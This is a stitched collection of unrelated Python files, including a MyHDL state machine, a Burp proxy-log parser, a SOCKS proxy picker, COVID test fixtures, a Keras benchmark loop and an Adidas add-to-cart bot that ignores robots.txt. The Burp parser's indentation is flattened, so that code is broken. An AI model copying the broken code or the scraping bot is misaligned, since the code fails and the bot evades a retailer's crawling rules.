    NOTE: Use context.read.format('parquet').load(...) to read a parquet file.
    NOTE: Make sure standalone spark cluster is running.
    See https://spark.apache.org/docs/latest/sql-getting-started.html for help.
    See https://spark.apache.org/docs/2.1.0/api/python/pyspark.sql.html for help.
    See https://spark.apache.org/docs/latest/spark-standalone.html for help.
    """
    # Connect to the locally running standalone Spark master and get a session.
    spark = SparkSession \
        .builder \
        .appName("words") \
        .master("spark://127.0.1.1:7077") \
        .getOrCreate()
    # Fill in here

# Runs unconditionally on import — consider guarding with `if __name__ == '__main__':`.
main()
|
import os
path = os.path
from myhdl import *
#INIT, RD_AND_JPEG_DATA, WR_DATA, INTERLACE, DONE = range(5)
ACTIVE_LOW = bool(0)
FRAME_SIZE = 8
t_State = enum('INIT', 'RD_AND_JPEG_DATA', 'WR_DATA', 'INTERLACE', 'DONE', encoding="one_hot")
def RamCtrl(SOF, state, WR_DATAFlag, clk_fast, reset_n, addrsam_r, addrjpeg_r, rd_r, wr_r):
    """ Framing control FSM.

    SOF -- start-of-frame output bit
    state -- RamState output
    WR_DATAFlag -- WR_DATA pattern found indication input
    clk_fast -- clock input
    reset_n -- active low reset
    addrsam_r -- sample-buffer address register (lower RAM half)
    addrjpeg_r -- jpeg-buffer address register (upper RAM half, base 8192)
    rd_r -- RAM read strobe
    wr_r -- RAM write strobe
    """
    index = Signal(intbv(0)[8:]) # position in frame

    @always(clk_fast.posedge, reset_n.negedge)
    def FSM():
        if reset_n == ACTIVE_LOW:
            # Asynchronous reset: rewind both address registers, clear strobes.
            SOF.next = 0
            index.next = 0
            addrsam_r.next = 1
            addrjpeg_r.next = 8192 + 1
            rd_r.next = 0
            wr_r.next = 0
            state.next = t_State.INIT
        else:
            index.next = (index + 1) % FRAME_SIZE
            SOF.next = 0
            if state == t_State.INIT:
                # Re-initialise addresses/strobes before a read pass begins.
                addrsam_r.next = 1
                addrjpeg_r.next = 8192 + 1
                rd_r.next = 0
                wr_r.next = 0
                state.next = t_State.RD_AND_JPEG_DATA
            elif state == t_State.RD_AND_JPEG_DATA:
                # Step through the sample buffer two addresses at a time.
                rd_r.next = 1
                if (addrsam_r <= 21):
                    addrsam_r.next = addrsam_r + 2
                else:
                    addrsam_r.next = 1
                    state.next = t_State.WR_DATA
            elif state == t_State.WR_DATA:
                # Write into the jpeg buffer; SOF pulses during this state.
                rd_r.next = 0
                wr_r.next = 1
                SOF.next = 1
                if addrjpeg_r <= (8192 + 21):
                    addrjpeg_r.next = addrjpeg_r + 2
                else:
                    wr_r.next = 0
                    addrjpeg_r.next = (8192 + 1)
                    state.next = t_State.INTERLACE
            elif state == t_State.INTERLACE:
                if (addrsam_r <= 21):
                    # NOTE(review): in a myhdl clocked block only the *last*
                    # .next assignment per signal takes effect, so rd_r and
                    # wr_r both end up 0 here — the intermediate 1s never
                    # reach hardware. Confirm whether read/write pulses were
                    # intended on alternating cycles instead.
                    rd_r.next = 1
                    addrsam_r.next = addrsam_r + 2
                    rd_r.next = 0
                    wr_r.next = 1
                    addrjpeg_r.next = addrjpeg_r + 2
                    wr_r.next = 0
                else:
                    addrsam_r.next = 1
                    addrjpeg_r.next = (8192 + 1)
                    state.next = t_State.INIT
            elif state == t_State.DONE:
                SOF.next = 0
            else:
                raise ValueError("Undefined state")
            #addrjpeg_r.next <= addrjpeg_r
            #addrsam_r.next <= addrsam_r
    return FSM
def main():
    """Elaborate RamCtrl with concrete signals and emit Verilog and VHDL."""
    SOF = Signal(bool(0))
    WR_DATAFlag = Signal(bool(0))
    clk_fast = Signal(bool(0))
    reset_n = Signal(bool(1))
    state = Signal(t_State.INIT)
    # 23-bit address range (max 8388608 = 2**23).
    addrsam_r = Signal(intbv(0, min = 0, max = 8388608))
    addrjpeg_r = Signal(intbv(0, min = 0, max = 8388608))
    rd_r = Signal(bool(0))
    wr_r = Signal(bool(0))
    # Emit both HDL targets from the same elaborated design.
    toVerilog(RamCtrl, SOF, state, WR_DATAFlag, clk_fast, reset_n, addrsam_r, addrjpeg_r, rd_r, wr_r)
    toVHDL(RamCtrl, SOF, state, WR_DATAFlag, clk_fast, reset_n, addrsam_r, addrjpeg_r, rd_r, wr_r)

if __name__ == '__main__':
    main()
|
#coding: utf-8
import re
import sys
import json
import requests
try:
from collections import OrderedDict as _default_dict
except ImportError:
_default_dict = dict
class BurplogParser(object):
def __init__(self, filename, dict_type=_default_dict):
self.dict = dict_type
self.fp = open(filename)
def __del__(self):
self.close()
def close(self):
if self.fp:
self.fp.close()
self.fp = None
def next(self):
packbag = self.readlog()
if not packbag:
raise StopIteration
return packbag
def readlog(self):
assert(self.fp is not None)
flag = 0
request = 0
packbag = self.dict()
while True:
line = self.fp.readline()
if not line:
break
if not line.strip():
if packbag.has_key('headers'):
flag = 1
continue
if line.find(' ') > 0:
cols = line.split()
if len(cols) >= 2:
if re.match(r'am|pm', cols[1], re.I):
cols.pop(1)
regtime = re.match(r'\d{1,2}\:\d{1,2}\:\d{1,2}', cols[0])
if regtime:
reghost = re.match(r'((http|https)\:\/\/[\w|\W]+)(\:\d{1,5})?', cols[1], re.I)
if reghost:
request = 1
hosts = reghost.group(0).split(':')
try:
packbag['host'] = hosts[0] + ':' + hosts[1]
packbag['schema'] = hosts[0]
packbag['port'] = int(hosts[2])
except Exception:
pass
if re.match(r'^[a-z].+http\/\d\.\d$', line, re.I):
cols = line.split()
packbag['headers'] = self.dict()
packbag['method'] = cols[0]
packbag['url'] = packbag['host'] + ':' + str(packbag['port']) + cols[1]
elif re.match(r'^\=+$', line):
if flag: break
else:
if packbag.has_key('headers'):
if not flag:
cols = line.split(':', 1)
if len(cols) >= 2:
packbag['headers'][cols[0]] = cols[1].rstrip()
else:
packbag['data'] = line.rstrip()
return packbag
def __iter__(self):
self.fp.seek(0)
while True:
packbag = self.readlog()
if not packbag:
return
yield packbag
if __name__ == '__main__':
    # Demo (Python 2 syntax): consume burplog.txt once via next() and once by iterating.
    burplog = BurplogParser("burplog.txt")
    try:
        while True:
            packbag = next(burplog)
            print packbag
    except StopIteration:
        pass
    # __iter__ seeks back to the start of the file, so this second pass
    # sees every record again.
    for index, package in enumerate(burplog):
        print package
    burplog.close()
|
import pytest
import pdb
from fhireval.test_suite.concept_map import example_code_system_source, reset_testdata
test_id = f"{'2.8.1':<10} - Create ConceptMap"
test_weight = 2
def test_codemap_create(host):
    """2.8.1: a ConceptMap can be created (201) and then deleted (200)."""
    # Start from a clean server state so prior runs cannot interfere.
    reset_testdata(host)
    result = host.post('ConceptMap', example_code_system_source, validate_only=False)
    assert result['status_code'] == 201
    cm_id = result['response']['id']
    # Clean up the resource we just created so later tests are unaffected.
    delete_result = host.delete_by_record_id('ConceptMap', cm_id)
    assert delete_result['status_code'] == 200
|
from requests import get
import requests
from requests.exceptions import ProxyError
def read_proxy(check=True):
    """Return a SOCKS5 proxies mapping built from torrents_parser/proxy.txt.

    Each line of the file holds one "host:port" entry.  When *check* is
    true, every candidate is probed against rutracker.org and the first
    reachable one is returned; otherwise the first non-blank entry wins.
    Returns None (after printing 'NONE PROXY') when no usable proxy is found.
    """
    # `with` guarantees the file handle is closed (the original leaked it).
    with open('torrents_parser/proxy.txt', 'r') as proxy_file:
        for line in proxy_file:
            entry = line.strip()  # drop the trailing newline the original kept
            if not entry:
                continue
            # Bug fix: the original built the address but then put a bare
            # 'socks5://' (no host) into the dict, so the proxy was never used.
            address = 'socks5://{}'.format(entry)
            proxies = {
                'http': address,
                'https': address
            }
            # The original also issued an unconditional, unguarded request to
            # google.com here whose result was discarded; removed.
            if check:
                try:
                    get('https://rutracker.org', proxies=proxies)
                except ProxyError:
                    continue
                else:
                    return proxies
            else:
                return proxies
    print('NONE PROXY')
    return None
|
#!/usr/bin/env python
from pathlib import Path
import pandas as pd
_PACKAGE_DIR = Path(__file__).absolute().parent # .../unit
_FIXTURES = Path.joinpath(_PACKAGE_DIR, 'fixtures') # .../unit/fixtures
_HTML = Path.joinpath(_FIXTURES, 'html') # .../unit/fixtures/html
# Fixture CSV named by date; the columns below match a JHU-CSSE-style daily
# COVID report — TODO confirm against the loader that consumes sample_file.
sample_file = Path('03-30-2020.csv')
# Column layouts for each stage of the cleaning pipeline exercised in tests.
raw_cols = ['FIPS', 'Admin2', 'Province_State', 'Country_Region', 'Last_Update', 'Lat', 'Long_', 'Confirmed', 'Deaths', 'Recovered', 'Active', 'Combined_Key']
lowercased_cols = ['fips', 'admin2', 'province_state', 'country_region', 'last_update', 'lat', 'long_', 'confirmed', 'deaths', 'recovered', 'active', 'combined_key']
necessary_cols = ['fips', 'confirmed', 'deaths']
bins_cols = ['fips', 'confirmed', 'deaths', 'confirmed_bins', 'deaths_bins']
date_cols = ['fips', 'confirmed', 'deaths', 'date']
raw_data = [
[2282, 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
[4025, 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
[5149, 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
[2290, 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
[4027, 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
[None, None, 'Alberta', 'Canada', '3/30/20 22:58', 53.9333, -116.5765, 661, 3, 0, 0, 'Alberta, Canada'],
[60000, None, 'American Samoa', 'US', '3/30/20 22:52', -14.271, -170.132, 0, 0, 0, 0, 'American Samoa, US'],
[None, None, 'Anguilla', 'United Kingdom', '3/30/20 22:52', 18.2206, -63.0686, 2, 0, 0, 2, 'Anguilla, United Kingdom'],
[None, None, None, 'United Kingdom', '3/30/20 22:52', 55.3781, -3.436, 22141, 1408, 135, 20598, 'United Kingdom'],
[88888, 'Big Boat', 'Diamond Princess', 'US', '3/30/20 22:52', 0, 0, 49, 0, 0, 0, 'Diamond Princess, US']
]
# Precursor: raw_data
dropna_data = [
[2282, 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
[4025, 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
[5149, 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
[2290, 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
[4027, 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
[88888, 'Big Boat', 'Diamond Princess', 'US', '3/30/20 22:52', 0, 0, 49, 0, 0, 0, 'Diamond Princess, US']
]
# Precursor: raw_data
us_data = [
[2282.0, 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
[4025.0, 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
[5149.0, 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
[2290.0, 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
[4027.0, 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
[60000.0, None, 'American Samoa', 'US', '3/30/20 22:52', -14.271, -170.132, 0, 0, 0, 0, 'American Samoa, US'],
[88888.0, 'Big Boat', 'Diamond Princess', 'US', '3/30/20 22:52', 0, 0, 49, 0, 0, 0, 'Diamond Princess, US']
]
# Precursor: raw_data
neccessarycol_data = [
[2282, 0, 0],
[4025, 15, 0],
[5149, 0, 0],
[2290, 0, 0],
[4027, 6, 0],
[None, 661, 3],
[60000, 0, 0],
[None, 2, 0],
[None, 22141, 1408],
[88888, 49, 0]
]
# Precursor: raw_data
recognizedfips_data = [
[2282, 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
[4025, 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
[5149, 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
[2290, 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
[4027, 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
[None, None, 'Alberta', 'Canada', '3/30/20 22:58', 53.9333, -116.5765, 661, 3, 0, 0, 'Alberta, Canada'],
[None, None, 'Anguilla', 'United Kingdom', '3/30/20 22:52', 18.2206, -63.0686, 2, 0, 0, 2, 'Anguilla, United Kingdom'],
[None, None, None, 'United Kingdom', '3/30/20 22:52', 55.3781, -3.436, 22141, 1408, 135, 20598, 'United Kingdom']
]
# Precursor: raw_data
leftpaddedfips_data = [
['02282', 'Yakutat', 'Alaska', 'US', '3/30/20 22:52', 59.8909808, -140.3601451, 0, 0, 0, 0, 'Yakutat, Alaska, US'],
['04025', 'Yavapai', 'Arizona', 'US', '3/30/20 22:52', 34.59933926, -112.5538588, 15, 0, 0, 0, 'Yavapai, Arizona, US'],
['05149', 'Yell', 'Arkansas', 'US', '3/30/20 22:52', 35.00292371, -93.41171338, 0, 0, 0, 0, 'Yell, Arkansas, US'],
['02290', 'Yukon-Koyukuk', 'Alaska', 'US', '3/30/20 22:52', 65.50815459, -151.3907387, 0, 0, 0, 0, 'Yukon-Koyukuk, Alaska, US'],
['04027', 'Yuma', 'Arizona', 'US', '3/30/20 22:52', 32.76895712, -113.9066674, 6, 0, 0, 0, 'Yuma, Arizona, US'],
['88888', 'Big Boat', 'Diamond Princess', 'US', '3/30/20 22:52', 0, 0, 49, 0, 0, 0, 'Diamond Princess, US']
]
# Precursor: neccessarycol_data
logbins_data = [
[2282, 0, 0, '0', '0'],
[4025, 15, 0, '2', '0'],
[5149, 0, 0, '0', '0'],
[2290, 0, 0, '0', '0'],
[4027, 6, 0, '1', '0'],
[None, 661, 3, '3', '1'],
[60000, 0, 0, '0', '0'],
[None, 2, 0, '1', '0'],
[None, 22141, 1408, '5', '4'],
[88888, 49, 0, '2', '0']
]
# Precursor: neccessarycol_data
datecol_data = [
[2282, 0, 0, '03-30-2020'],
[4025, 15, 0, '03-30-2020'],
[5149, 0, 0, '03-30-2020'],
[2290, 0, 0, '03-30-2020'],
[4027, 6, 0, '03-30-2020'],
[None, 661, 3, '03-30-2020'],
[60000, 0, 0, '03-30-2020'],
[None, 2, 0, '03-30-2020'],
[None, 22141, 1408, '03-30-2020'],
[88888, 49, 0, '03-30-2020']
]
# Expected output DataFrames
# Each frame pairs one of the fixture data lists above with its column list,
# giving a known-good DataFrame per pipeline stage for tests to compare against.
raw_df = pd.DataFrame(raw_data, columns=raw_cols)
dropna_df = pd.DataFrame(dropna_data, columns=raw_cols)
lowercasedcols_df = pd.DataFrame(dropna_data, columns=lowercased_cols)
us_df = pd.DataFrame(us_data, columns=lowercased_cols)
neccessarycol_df = pd.DataFrame(neccessarycol_data, columns=necessary_cols)
recognizedfips_df = pd.DataFrame(recognizedfips_data, columns=lowercased_cols)
leftpaddedfips_df = pd.DataFrame(leftpaddedfips_data, columns=lowercased_cols)
logbins_df = pd.DataFrame(logbins_data, columns=bins_cols)
datecol_df = pd.DataFrame(datecol_data, columns=date_cols)
print(neccessarycol_df)  # NOTE(review): prints at import time — likely debug leftover
|
import mechanize
import urllib
from urllib import urlopen
import cookielib
import BeautifulSoup
import html2text
import re
import sys
import StringIO
from urllib2 import HTTPError
import os
import time
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
import requests
import pickle
# Initialize mechanize headless browser
br = mechanize.Browser()
# This is where we hold our cookies
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br._ua_handlers['_cookies'].cookiejar
# Browser options
br.set_handle_equiv(True)
br.set_handle_gzip(False)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
# Follows refresh 0 but doesn't hang on refresh > 0
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
# UA
br.addheaders = [('User-agent', 'Chrome')]
# Initialize selenium with a headless driver as well for behind the scenes magic
# Have phantomjs.exe in same directory as where this file is
myPhantomFolder = os.getcwd()
browser = webdriver.PhantomJS(executable_path=(str(myPhantomFolder)+'\\phantomjs.exe'))
# Freshen up
browser.delete_all_cookies()
print'............................................................'
print'......77777......................................77777......'
print'.....777777...............:?+++??...............777777......'
print'...7 777777...........??+++++++++++++...........,7777777,...'
print'..777777777.........+++++++++++++++++++~........,77777777 ..'
print'..7777777777?.....?++.+?++++++++++++++.++......7777777777 ..'
print'...777.: 77777...++:.+.??.++++++++++.++.++...7777777.7777...'
print'.........777777.++++++++++++++++++++:++?~++..77777..........'
print'...........777.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~. 77~...........'
print'............,7.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.7.............'
print'..............:~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~...............'
print'.......?+????+++??++++++++++++++++++??+++++++?++??+??.......'
print'.......??????????????????????????????????????????????.......'
print'..............:7777777 7777777777777777777777...............'
print'...............7777 +......777777......777777...............'
print'...............77777........777 ........7777................'
print'................777,........777 ........777.................'
print'.................777.......77777........77..................'
print'..................777.....7777777?....I 7...................'
print'....................7777 777...7777 777.....................'
print'......................=777777 7777777.......................'
print'.....................777...........=77.~....................'
print'..................77.777I7 77.77 I7777+77...................'
print'................777.77...7777.7777.:.,7.777.................'
print'...............7777.7 77.77~...:77.777 .77777...............'
print'........777..777777.7..7.7777.7777.77...777777..77 .........'
print'.......7777777777 ..7777....+.I:...?777..77777777777~.......'
print'......,777777777....:777777777777777777....7777777777.......'
print'.......+7777777~.....7777777777777777 ......77777777........'
print'..........777777......777777777777777......777777...........'
print'..........:77777........77777777777........777777...........'
print'............,~...............................++.............\n'
# Adidas three-digit size code keyed by US shoe size.
# Sizes outside 8-12 leave threeDigit undefined (same behavior as the
# original nine-branch if-chain), so only use the sizes listed here.
SIZE_CODES = {
    '8': "610",
    '8.5': "620",
    '9': "630",
    '9.5': "640",
    '10': "650",
    '10.5': "660",
    '11': "670",
    '11.5': "680",
    '12': "690",
}
sizeIn = raw_input("Size (8-12): ")
if sizeIn in SIZE_CODES:
    threeDigit = SIZE_CODES[sizeIn]
# Self explanatory variables
# Stub out/play with url strings to see results and causality
cart_url="https://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-Show"
url = "http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=B35309_"+str(threeDigit)+"&Quantity=1&masterPid=B35309add-to-cart-button="
# Test Cases below
'''
url="http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=B26813_650&Quantity=1&masterPid=B26813add-to-cart-button="
url="http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=B35996_660&Quantity=1&masterPid=B35996add-to-cart-button="
url="http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=M18838_610&Quantity=1&masterPid=M18838add-to-cart-button="
url="http://www.adidas.com/on/demandware.store/Sites-adidas-US-Site/en_US/Cart-MiniAddProduct?layer=Add%20To%20Bag%20overlay&pid=M29395_670&Quantity=1&masterPid=M29395add-to-cart-button="
'''
# Counter variable to keep track of tries
loop = 1
print "\nRunning..."
# Display the style code: the token just before "add-to-cart-button=" in the URL.
print "Target (StyleCode): " + str(url.split("add-to-cart-button=")[0].split("=")[len(url.split("add-to-cart-button=")[0].split("="))-1])
while (1==1):
    try:
        # Throttle: one attempt every 3 seconds so the server isn't hammered.
        time.sleep(3)
        # Point both the mechanize browser and the headless selenium driver
        # at the add-to-cart URL and inspect what comes back.
        br.open(str(url))
        browser.get(url)
        # Scrape page for anything in span tag.
        # Can use the contrapositive with the <strong> tag with the null on not yet available items
        regex='<span>(.+?)</span>'
        pattern = re.compile(regex)
        htmltext = br.open(str(url)).read()
        title = re.findall(pattern,htmltext)
        # Debug screenshot, saved next to this script.
        browser.save_screenshot("addRequest.png")
        # If page has an element of <span> tag, trigger - ATC
        if len(title)>0:
            print "Try: " + str(loop) + " - ATC success! Getting cart...\n"
            # Bringing to cart page for easiser load on cookies
            br.open(cart_url)
            # Persist the successful session cookies so a visible browser can reuse them.
            pickle.dump(browser.get_cookies(), open("cookies.pkl","wb"))
            # Switch from the headless PhantomJS driver to visible Chrome.
            browser = webdriver.Chrome()
            # Reload the cookie file we just wrote.
            cookies = pickle.load(open("cookies.pkl", "rb"))
            # Cookies to console
            print "Here, have some cookies ya bish..."
            print cookies
            # Cookies are domain-specific, so open the cart page first...
            browser.get(cart_url)
            # ...then inject the saved cookies into the new session.
            for cookie in cookies:
                browser.add_cookie(cookie)
            # Refresh to see our successful cookies
            browser.refresh()
            # Okay Adidas
            browser.refresh()
            # Keep the browser open for 10 minutes so the user can check out.
            # NOTE(review): cookies.pkl is never cleaned up and the loop keeps running.
            time.sleep(600)
        # Sorry no <span> tags in your html document
        if len(title)==0:
            print "Try: " + str(loop) + " - Not yet available \n"
        # Increment count
        loop+=1
    except:
        # NOTE(review): bare except also swallows KeyboardInterrupt on
        # Python 2 — `except Exception:` would be safer.
        print "Try: " + str(loop) + " - IDEK WHAT YOUR DOING BRUH. \n"
        loop+=1
        continue
os.system("pause")
|
import os
from configparser import ConfigParser
configur = ConfigParser()
# Resolve config.ini relative to this file so imports work from any cwd.
config_path = f"{os.path.dirname(os.path.abspath(__file__))}/config.ini"
configur.read(config_path)
def get_config(config_key):
    """Return *config_key* from the config section named by $ENV (default: "dev")."""
    section = os.getenv("ENV", "dev")
    return configur.get(section, config_key)
import os, gc, time, datetime, argparse
import numpy as np
import pandas as pd
import tensorflow as tf
from tensorflow import keras
from models.rnn_models import naive_RNNs, LSTMs, GRUs
from models.fcn import FCN
from models.lstm_fcn import LSTM_FCN, ALSTM_FCN
from models.lstnet import LSTNet
from models.resnet import ResNet
from models.tcn import TCN
from models.transformer import Transformer
# from models.mtnet import MTNet
# from models.darnn import DARNN
# from models.nbeat import NbeatsNet
from net_init_utils import NetInit
from mtsc_data_utils import ReadData
from eval_metrics import Accuracy_Score, Precision_Score, Recall_Score, Auc_Score, F1_Score
# os.environ["CUDA_VISIBLE_DEVICES"] = "2"
# gpus = tf.config.experimental.list_physical_devices(device_type='GPU')
# tf.config.experimental.set_virtual_device_configuration(gpus[0], \
# [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=2048)])
tf.random.set_seed(2021)
keras.backend.clear_session()
Data_Config = {
'ArabicDigits': 10,
'AUSLAN': 95,
'CharacterTrajectories': 20,
'CMUsubject16': 2,
'DigitShapes': 4,
'ECG': 2,
'JapaneseVowels': 9,
'KickvsPunch': 2,
'LIBRAS': 15,
'NetFlow': 2,
'PEMS': 7,
'PenDigits': 10,
'RobotFailureLP1': 4,
'RobotFailureLP2': 5,
'RobotFailureLP3': 4,
'RobotFailureLP4': 3,
'RobotFailureLP5': 5,
'Shapes': 3,
'UWave': 8,
'Wafer': 2,
'WalkvsRun': 2
}
Model = {
'naive_RNN': naive_RNNs,
'LSTM': LSTMs,
'GRU': GRUs,
'FCN': FCN,
'LSTM_FCN': LSTM_FCN,
'ALSTM_FCN': ALSTM_FCN,
'ResNet': ResNet,
'TCN': TCN,
'LSTNet': LSTNet,
'Transformer': Transformer
}
parser = argparse.ArgumentParser('Multivariate time series forecasting')
parser.add_argument('--optim', type=str, default='Adam', help='optional: SGD, RMSprop, and Adam')
parser.add_argument('--learning_rate', type=float, default=0.001, help='optimizer learning rate')
parser.add_argument('--batch_size', type=int, default=128, help='network update batch size')
parser.add_argument('--epochs', type=int, default=100, help='Epochs')
parser.add_argument('--loss', type=str, default='categorical_crossentropy',
help='loss function to use. Default=mean_absolute_error')
args = parser.parse_args()
def train(model, X_train, y_train, callbacks, X_valid=None, y_valid=None):
    """Fit *model* and print the elapsed wall-clock time.

    Uses (X_valid, y_valid) as the validation set when provided; otherwise
    holds out 20% of the training data via validation_split.
    """
    start_time = time.time()
    # Bug fix: the old test `X_valid.any() != None` crashed with
    # AttributeError when X_valid was None, and otherwise compared a bool
    # against None (always True). A plain identity check is what was meant.
    if X_valid is not None:
        val_data = (X_valid, y_valid)
        model.fit(X_train, y_train, epochs=args.epochs, batch_size=args.batch_size, validation_data=val_data, callbacks=callbacks)
    else:
        model.fit(X_train, y_train, epochs=args.epochs, batch_size=args.batch_size, validation_split=0.2, callbacks=callbacks)
    elapsed = round(time.time() - start_time)
    elapsed = str(datetime.timedelta(seconds=elapsed))
    print("Training. Total elapsed time (h:m:s): {}".format(elapsed))
def main(net_init, data_path, data_classes, data_name, MODEL, model_name, file_res):
    """Train MODEL on one dataset and append its test metrics to file_res.

    Parameters
    ----------
    net_init : NetInit
        Network hyper-parameter container (RNNUnits, FeatDims set by caller).
    data_path : str
        Path to the .mat dataset consumed by ReadData.
    data_classes : int
        Expected class count; asserted against what ReadData reports.
    MODEL : callable
        Model constructor taking (net_init, input_shape=...).
    file_res : file object
        Open CSV results file; one metrics row is appended per call.
    """
    X_train, y_train, X_test, y_test, nb_classes = ReadData(data_path)
    assert data_classes == nb_classes
    y_train = keras.utils.to_categorical(y_train, nb_classes)
    y_test = keras.utils.to_categorical(y_test, nb_classes)
    # Small datasets get a proportionally smaller batch, capped at 16.
    args.batch_size = min(int(X_train.shape[0]/10), 16)
    model = MODEL(net_init, input_shape=X_train.shape[1:])
    if args.optim == 'SGD':
        # Bug fix: was `args.learing_rate` (typo), which raised
        # AttributeError whenever the SGD branch was selected.
        optimizer = keras.optimizers.SGD(learning_rate=args.learning_rate, momentum=0.0, decay=0.0, nesterov=False)
    elif args.optim == 'RMSprop':
        # Bug fix: same `learing_rate` typo as above.
        optimizer = keras.optimizers.RMSprop(learning_rate=args.learning_rate, rho=0.9, epsilon=1e-8, decay=0.0)
    else: # Adam
        optimizer = keras.optimizers.Adam(learning_rate=args.learning_rate, beta_1=0.9, beta_2=0.999)
    model.compile(loss=args.loss, optimizer=optimizer, metrics=['accuracy'])
    callbacks = [
        keras.callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.5, patience=40, min_lr=0.0001),
        keras.callbacks.EarlyStopping(monitor='val_loss', min_delta=1e-5, patience=60)
    ]
    # Training Model (test set doubles as the validation set here).
    train(model, X_train, y_train, callbacks, X_valid=X_test, y_valid=y_test)
    # Testing Evaluation: AUC needs the raw probabilities, the other
    # metrics need hard class labels, so argmax comes after Auc_Score.
    pred_test = model.predict(X_test)
    test_auc = Auc_Score(y_test, pred_test)
    pred_test = np.argmax(pred_test, axis=1)
    y_test = np.argmax(y_test, axis=1)
    test_acc = Accuracy_Score(y_test, pred_test)
    test_precision = Precision_Score(y_test, pred_test)
    test_recall = Recall_Score(y_test, pred_test)
    test_f1 = F1_Score(y_test, pred_test)
    print('The current dataset:', data_name, ' | The current model:', model_name)
    print('[Test] Accuracy - {:.4f} Precision - {:.4f} Recall - {:.4f} AUC - {:.4f} F1 - {:.4f}'
          .format(test_acc, test_precision, test_recall, test_auc, test_f1))
    file_res.write('{}, {}, {}, {}, {}, {}, {}\n'.format(datetime.datetime.now(), net_init.RNNUnits, test_acc, test_precision, test_recall, test_auc, test_f1))
    # Free the large arrays before the next sweep iteration.
    del X_train, y_train, X_test, y_test, model, optimizer
    gc.collect()
if __name__ == '__main__':
    net_init = NetInit()
    # Sweep every dataset x model x RNN-width combination.
    for data_name, data_classes in zip(Data_Config.keys(), Data_Config.values()):
        data_path = '/mnt/nfsroot/zhangxj/ts_multivariate_classification//TSDatasets/' + data_name + '.mat'
        for model_name, model in zip(Model.keys(), Model.values()):
            print('The current dataset:', data_name, ' | The current model:', model_name)
            # Append mode: repeated runs accumulate rows (and re-write the header).
            file_res = open(f'/home/zhangxj/program/results/mtsc/{data_name}_{model_name}_results.csv', 'a+')
            file_res.write('moment, rnn_units, Accuracy, Precision, Recall, AUC, F1\n')
            for n in [16, 32, 64]:
                net_init.RNNUnits = n
                net_init.FeatDims = data_classes
                main(net_init, data_path, data_classes, data_name, model, model_name, file_res)
            file_res.close()
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-11-21 17:17
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    # Drops the Usuarios model (and its table); depends on the migration
    # that originally created it.
    dependencies = [
        ('apps', '0002_usuarios'),
    ]
    operations = [
        migrations.DeleteModel(
            name='Usuarios',
        ),
    ]
|
def gcd(a, b):
